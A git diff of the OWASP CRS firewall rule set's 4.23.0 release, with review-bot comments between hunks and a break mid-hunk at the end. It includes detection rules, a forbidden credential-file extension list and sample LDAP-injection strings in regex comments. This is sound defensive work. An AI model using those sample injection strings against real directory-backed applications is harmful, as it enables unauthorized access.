diff --git a/.github/workflows/duty-scheduler.yaml b/.github/workflows/duty-scheduler.yaml index 6677189198..29d077c913 100644 --- a/.github/workflows/duty-scheduler.yaml +++ b/.github/workflows/duty-scheduler.yaml @@ -11,6 +11,7 @@ permissions: {} jobs: duty-report: runs-on: ubuntu-latest + if: github.repository == 'coreruleset/coreruleset' permissions: contents: write steps: diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml index 25af5fcbd2..db88ae1a05 100644 --- a/.github/workflows/lint.yaml +++ b/.github/workflows/lint.yaml @@ -17,7 +17,7 @@ on: env: CRS_TOOLCHAIN_VERSION: '2.6.0' SECRULES_PARSING_VERSION: '0.2.12' - CRS_LINTER_VERSION: '0.2.2' + CRS_LINTER_VERSION: '1.0.0' jobs: check-syntax: @@ -26,8 +26,7 @@ jobs: - name: Checkout repo uses: actions/checkout@1af3b93b6815bc44a9784bd300feb67ff0d1eeb3 # v6.0.0 with: - # required for version detection using `git describe` - fetch-depth: 50 + fetch-depth: 0 - name: Lint Yaml uses: ibiqlik/action-yamllint@2576378a8e339169678f9939646ee3ee325e845c # v3.1.1 diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml index 13136db467..32c75641ec 100644 --- a/.github/workflows/stale.yml +++ b/.github/workflows/stale.yml @@ -8,13 +8,14 @@ jobs: stale: runs-on: ubuntu-latest + if: github.repository == 'coreruleset/coreruleset' steps: - uses: actions/stale@28ca1036281a5e5922ead5184a1bbf96e5fc984e # v9.0.0 with: repo-token: ${{ secrets.GITHUB_TOKEN }} - stale-issue-message: 'This issue has been open 30 days waiting for feedback. Remove the stale label or comment, or this will be closed in 14 days' + stale-issue-message: 'This issue has been open 45 days waiting for feedback. Remove the stale label or comment, or this will be closed in 30 days' stale-issue-label: 'Stale issue' - days-before-stale: 30 - days-before-close: 14 + days-before-stale: 45 + days-before-close: 30 only-issue-labels: ':hourglass_flowing_sand: awaiting feedback' 
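Review bot: The checkout step in lint.yaml now uses `fetch-depth: 0` but drops the only comment that explained why history is fetched at all, so the next reader has no reason not to revert to the default shallow clone. The removed comment tied the depth to `git describe`-based version detection; if that is still the reason (presumably the crs-linter 1.0.0 bump in the previous hunk needs tags or full history), keep a why-comment such as `# full history and tags are required for version detection via git describe`. A full clone also costs more on every run, so the comment should make clear that it is deliberate rather than an accident of copy-paste.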
diff --git a/.gitignore b/.gitignore index 1c073edd82..b5f1f07a48 100644 --- a/.gitignore +++ b/.gitignore @@ -32,3 +32,4 @@ tests/.env # Ignore Go-FTW configuration file .ftw.yaml +crs-toolchain diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 7017879f5e..51f51c5423 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -20,7 +20,7 @@ repos: exclude: '^regex-assembly/' args: [--markdown-linebreak-ext=md] - repo: https://github.com/adrienverge/yamllint.git - rev: v1.37.1 + rev: v1.38.0 hooks: - id: yamllint args: [-f=github, -c=.yamllint.yml] diff --git a/CHANGES.md b/CHANGES.md index 698615706d..f5e763ed7f 100644 --- a/CHANGES.md +++ b/CHANGES.md 
@@ -5,6 +5,49 @@ or the CRS Google Group at * https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project +## Version 4.23.0 - 2026-03-04 + +## What's Changed +### ⭐ Important changes +* feat(920640): add rule to enforce content-type if there is body by @fzipi in https://github.com/coreruleset/coreruleset/pull/4406 +### 🆕 New features and detections 🎉 +* feat(lfi): Add detection for Vite.js path traversal (CVE-2025-30208) by @disisto in https://github.com/coreruleset/coreruleset/pull/4407 +* feat: block fake `mozilla/5.g` user-agent by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4383 +* feat: resolve common false positives with ad and tracker cookies by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4378 +* fix(ssrf): catch malformed urls by @fzipi in https://github.com/coreruleset/coreruleset/pull/4410 +* feat: block 'trap' command by @azurit in https://github.com/coreruleset/coreruleset/pull/4422 +* feat: prevent php session files to be uploaded by @fzipi in https://github.com/coreruleset/coreruleset/pull/4412 +* feat(930130): improvement of the detection of common debug or error files across CMS platforms by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4426 +* feat(942450): add another hex + binary declaration pattern by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4374 +* feat: update restricted files and file extensions by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4299 +* feat(920650): add detection for framework method overrides by @fzipi in https://github.com/coreruleset/coreruleset/pull/4416 +* fix: remove Request-Range Header from rules by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4435 +* feat: block when Request-Range header is used by @fzipi in https://github.com/coreruleset/coreruleset/pull/4436 +### 🧰 Other Changes +* fix: remove bypass-vulnerable content types from default allow lists by @RedXanadu in 
https://github.com/coreruleset/coreruleset/pull/4365 +* feat(931131): removing off domain check by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4379 +* chore(933120): cleaning obsolete variable by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4417 +* chore(941360,941370,941380): cleaning useless capture keyword by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4419 +* chore(933151,933152,933153): cleaning useless variables by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4420 +* feat(942350): added replace keyword + c-type comment evasion by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4373 +* fix(933111): regex should be the same as 933110 by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4395 +* fix: FPs related to maxDB information leakage by @azurit in https://github.com/coreruleset/coreruleset/pull/4382 +* fix: remove non-unix commands from unix rce rules (932230 PL-1, 932235 PL-1, 932250 PL-1, 932260 PL-1, 932220 PL-2, 932236 PL-2, 932239 PL-2, 932237 PL-3) by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4247 +* fix(941120): new regex is eligible for Paranoia Level 1 by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4291 +* fix(933150): reduce substring false positive matches by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4340 +* fix(942410): cleaning of duplicates with 942151 by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4336 +* fix: add separate rule to match unix commands with no arguments by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4273 +* fix(934140): update perl interpolation regex by @fzipi in https://github.com/coreruleset/coreruleset/pull/4250 +* feat(921200): move regexp to regex-assembly by @fzipi in https://github.com/coreruleset/coreruleset/pull/4409 +* fix(934190): add new rule to check localhost 
variants without scheme by @fzipi in https://github.com/coreruleset/coreruleset/pull/4429 +* feat(941110): all HTTP headers should be checked by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4326 +* feat(941120): all HTTP headers should be checked by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4327 + +## New Contributors +* @disisto made their first contribution in https://github.com/coreruleset/coreruleset/pull/4407 + +**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.22.0...v4.23.0 + ## Version 4.22.0 - 2026-01-05 ## What's Changed diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md index 8bbedaa146..eb7a415dad 100644 --- a/CONTRIBUTORS.md +++ b/CONTRIBUTORS.md @@ -30,6 +30,7 @@ ## Contributors: +- [disisto](https://github.com/disisto) - [touchweb-vincent](https://github.com/touchweb-vincent) - [Elnadrion](https://github.com/Elnadrion) - [pha6d](https://github.com/pha6d) diff --git a/SECURITY.md b/SECURITY.md index 10c0813a26..25f99f6a7c 100644 --- a/SECURITY.md +++ b/SECURITY.md @@ -11,8 +11,8 @@ Along those lines, OWASP CRS team may not issue security notifications for unsup | Version | Supported | | --------- | ------------------ | +| 4.23.z | :white_check_mark: | | 4.22.z | :white_check_mark: | -| 4.21.z | :white_check_mark: | | 4.y.z | :x: | | 3.3.x | :white_check_mark: | | 3.2.x | :x: | diff --git a/crs-setup.conf.example b/crs-setup.conf.example index a3831fe0c7..6b8d46cc7f 100644 --- a/crs-setup.conf.example +++ b/crs-setup.conf.example @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # 
@@ -181,7 +181,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.blocking_paranoia_level=1" @@ -209,7 +209,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.detection_paranoia_level=1" @@ -235,7 +235,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.enforce_bodyproc_urlencoded=1" @@ -270,7 +270,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.critical_anomaly_score=5,\ # setvar:tx.error_anomaly_score=4,\ # setvar:tx.warning_anomaly_score=3,\ @@ -324,7 +324,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.inbound_anomaly_score_threshold=5,\ # setvar:tx.outbound_anomaly_score_threshold=4" @@ -385,7 +385,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.reporting_level=4" @@ -417,7 +417,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.early_blocking=1" @@ -438,7 +438,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.enable_default_collections=1" 
@@ -476,12 +476,42 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" +# +# -- [[ HTTP Method Override Parameter ]] ------------------------------------- +# +# Many web frameworks (Laravel, Rails, Symfony, CakePHP, Express.js, etc.) +# support overriding the HTTP method via a _method parameter in the query +# string or request body. This allows HTML forms to simulate PUT, PATCH, +# and DELETE requests. +# +# While this is legitimate framework behavior, it can be abused for: +# - WAF bypass (sending POST with _method=DELETE) +# - CSRF attacks bypassing SameSite=Lax cookie restrictions +# - Method-based ACL bypass +# +# By default, CRS blocks _method parameter usage at PL2+. If your application +# legitimately uses the _method parameter for method override, you can allow +# it by uncommenting the rule below. +# +# Note: The X-HTTP-Method-Override header is handled separately by rule 920450. +# +# Uncomment this rule to ALLOW _method parameter for method override: +# +#SecAction \ +# "id:900210,\ +# phase:1,\ +# pass,\ +# nolog,\ +# tag:'OWASP_CRS',\ +# ver:'OWASP_CRS/4.23.0',\ +# setvar:'tx.allow_method_override_parameter=1'" + # Content-Types that a client is allowed to send in a request. # Default: |application/x-www-form-urlencoded| |multipart/form-data| |text/xml| -# |application/xml| |application/soap+xml| |application/json| |application/reports+json| |application/csp-report| +# |application/xml| |application/soap+xml| |application/json| # # Please note, that the rule where CRS uses this variable (920420) evaluates it with operator # `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom 
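Review bot: The new 900210 example does not name the rule that reads `tx.allow_method_override_parameter`, while the surrounding blocks tell the reader which rule consumes each variable (for example 920420 for `tx.allowed_request_content_type`). Presumably the consumer is the 920650 rule listed in this release's changelog; if so, add a line such as `# The variable is evaluated by rule 920650 (paranoia level 2 and above).` next to the existing note about 920450. It is also worth stating that the setting is host-wide: enabling it switches off the `_method` check for every path, including the CSRF and ACL-bypass cases the comment itself lists, so a narrower per-location exclusion may be the better tool when only one application needs the override. Finally, the hunk only shows the neighbouring allowed_methods block, so I could not confirm from here that id 900210 is unused elsewhere in the file.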
@@ -516,7 +546,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # chain" # SecRule REQUEST_URI "@rx ^/foo/bar" \ # "t:none,\ @@ -535,8 +565,8 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ -# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/reports+json| |application/csp-report|'" +# ver:'OWASP_CRS/4.23.0',\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json|'" # Allowed HTTP versions. # Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0 
@@ -551,12 +581,12 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Forbidden file extensions. # Guards against unintended exposure of development/configuration files. -# Default: .ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swp/ .sys/ .temp/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/ +# Default: .ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/ # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ # Note that .axd was removed due to false positives (see PR 1925). # 
@@ -575,8 +605,8 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ -# setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swp/ .sys/ .temp/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" +# ver:'OWASP_CRS/4.23.0',\ +# setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" # Restricted request headers. # The HTTP request headers that CRS restricts are split into two categories: @@ -631,7 +661,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/ /expect/'" # # [ Extended ] 
@@ -657,7 +687,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.restricted_headers_extended=/accept-charset/'" # Content-Types charsets that a client is allowed to send in a request. @@ -676,7 +706,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # @@ -702,7 +732,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.max_num_args=255" # Block request if the length of any argument name is too high @@ -716,7 +746,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.arg_name_length=100" # Block request if the length of any argument value is too high @@ -730,7 +760,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.arg_length=400" # Block request if the total length of all combined arguments is too high @@ -744,7 +774,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.total_arg_length=64000" # Block request if the file size of any individual uploaded file is too high @@ -758,7 +788,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.max_file_size=1048576" # Block request if the total size of all combined uploaded files is too high 
@@ -772,7 +802,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.combined_file_sizes=1048576" @@ -812,7 +842,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # pass,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.sampling_percentage=100" @@ -833,7 +863,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.crs_validate_utf8_encoding=1" # -- [[ Skip Checking Responses ]] ------------------------------------------------ @@ -855,7 +885,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.crs_skip_response_analysis=1" # @@ -876,5 +906,5 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ - setvar:tx.crs_setup_version=4220" + ver:'OWASP_CRS/4.23.0',\ + setvar:tx.crs_setup_version=4230" diff --git a/regex-assembly/921200.ra b/regex-assembly/921200.ra new file mode 100644 index 0000000000..1e62353635 --- /dev/null +++ b/regex-assembly/921200.ra 
@@ -0,0 +1,77 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! -=[ LDAP Injection ]=- +##! +##! This rule attempts to detect LDAP injection attacks. +##! It is based on a BlackHat presentation by Alonso Parada +##! and regex writing by Denis Kolegov. +##! +##! References: +##! * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf +##! * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +##! * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 +##! +##! LDAP filter syntax (RFC 4515): +##! filter = "(" filtercomp ")" +##! filtercomp = and / or / not / item +##! and = "&" filterlist +##! or = "|" filterlist +##! not = "!" filter +##! filterlist = 1*filter +##! item = simple / present / substring / extensible +##! simple = attr filtertype assertionvalue +##! filtertype = equal / approx / greaterorequal / lessorequal +##! equal = "=" +##! approx = "~=" +##! greaterorequal = ">=" +##! lessorequal = "<=" +##! +##! Attack patterns detected: +##! 1. Closing parenthesis followed by filter opening: )(... +##! 2. Boolean operator injection: &, |, ! operators +##! 3. Filter attribute manipulation with comparison operators: attr>=, attr<=, attr~= +##! +##! The regex detects attempts to break out of LDAP filter context by: +##! - Injecting closing parenthesis followed by new filter constructs +##! - Injecting boolean operators (&, |, !) to modify filter logic +##! - Injecting comparison operators (=, >=, <=, ~=) with attributes + +##! Character class definitions for LDAP special characters +##! Note: Using \x3c for < and \x3e for > to prevent invalid range issues +##! when the assembler reorders characters (< = 0x3c, = = 0x3d, > = 0x3e) +##! Template variable definitions ({{...}}) do NOT work in prefix/suffix markers; +##! 
those markers are literal with respect to {{define}} substitution, but standard +##! regex escape sequences (such as \x3c and \x3e) still apply. +##! +##! Different positions in the original regex used different character sets: +##! - ldap-prefix-chars: excludes colon (:) and special chars, but NOT comma (used in prefix and pattern 3 suffix) +##! - ldap-pattern-chars: excludes comma (,) and equals (=), but NOT colon (used in patterns 1 and 3) +##!> define ldap-prefix-chars :\(\)&\|\!\x3c\x3e~ +##!> define ldap-pattern-chars ,=\(\)&\|\!\x3c\x3e~ +##!> define ldap-bool-ops &!\| +##!> define comparison-prefix \x3c\x3e~ + +##! Prefix: Match any characters that are NOT LDAP special characters at the start, +##! followed by a closing parenthesis. This represents breaking out of a filter value. +##! Note: Must be literal here with respect to {{define}} substitutions, as template +##! variables cannot be used in the prefix marker (but normal regex escapes can) +##! ldap-prefix-chars = : ( ) & | ! < > ~ (NO comma) +##!^ ^[^:\(\)&\|\!\x3c\x3e~]*\)\s* + +##! Pattern 1: Opening parenthesis followed by either: +##! a) An attribute name followed by optional comparison modifier and equals sign +##! b) Whitespace and boolean operator with optional parenthesis +##! Example attacks: )(uid=*, )(&(objectClass=*), )(|(cn=admin +##! Uses ldap-pattern-chars which excludes: , ( ) = & | ! < > ~ (NO colon) +\((?:[^{{ldap-pattern-chars}}]+[{{comparison-prefix}}]?=|\s*[{{ldap-bool-ops}}]\s*[\(\)]?\s*) + +##! Pattern 2: Closing parenthesis followed by opening parenthesis with boolean operator +##! Example attacks: ))((&, ))((|, ))((! +\)\s*\(\s*[{{ldap-bool-ops}}]\s* + +##! Pattern 3: Boolean operator followed by opening parenthesis and attribute with comparison +##! Example attacks: &(uid>=admin, |(cn<=test, !(sn~=value +##! First char class uses ldap-pattern-chars (excludes comma, NOT colon) +##! 
Second char class uses ldap-prefix-chars (excludes colon, NOT comma)
+[{{ldap-bool-ops}}]\s*\([^{{ldap-pattern-chars}}]+[{{comparison-prefix}}]?=[^{{ldap-prefix-chars}}]*
diff --git a/regex-assembly/932235.ra b/regex-assembly/932235.ra
index 5be5f0dc65..905816867d 100644
--- a/regex-assembly/932235.ra
+++ b/regex-assembly/932235.ra
@@ -8,4 +8,4 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ [\s<>&|),] ~ \S{1,10}\b
diff --git a/regex-assembly/932236.ra b/regex-assembly/932236.ra
index eb3ed2fdb3..15afc495df 100644
--- a/regex-assembly/932236.ra
+++ b/regex-assembly/932236.ra
@@ -11,5 +11,5 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
-##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|),] ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|),] ~ \S{1,10}\b
diff --git a/regex-assembly/932237.ra b/regex-assembly/932237.ra
index d676d02b83..f504eafd91 100644
--- a/regex-assembly/932237.ra
+++ b/regex-assembly/932237.ra
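Review bot: The prefix marker `##!^ ^[^:\(\)&\|\!\x3c\x3e~]*\)\s*` in 921200.ra repeats the `ldap-prefix-chars` character set by hand because, as the comment explains, `{{define}}` substitution does not apply in prefix markers; nothing now ties the two together, so a later edit to the define will silently desynchronise the prefix. Put `##! KEEP IN SYNC with the ldap-prefix-chars define above` directly above the marker so the coupling is visible at the point of edit. A smaller point: the trailing `\s*` in pattern 2 and at the end of the second alternative of pattern 1 cannot change whether the assembled regex matches, since the file declares no suffix marker, so they only add work for the engine and could be dropped unless a suffix is planned.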
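Review bot: Dropping the `|$` alternative from the `@` processor in 932235.ra (and identically in 932236, 932237, 932239 and 932260) means a command that ends the input with no argument no longer matches these rules, and the comment above the line still only says the pattern approximates the cmdline processor. Presumably the end-of-string case is now handled by the new 932340/932350 no-argument rules; if so, say that where the change was made, for example `##! Commands at end of input with no arguments are matched by 932340/932350, not here.` Since the line is shared across several files, a reviewer reading only one of them otherwise cannot tell whether the dropped case is a regression or a deliberate split.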
@@ -10,6 +10,6 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
-##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
-##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
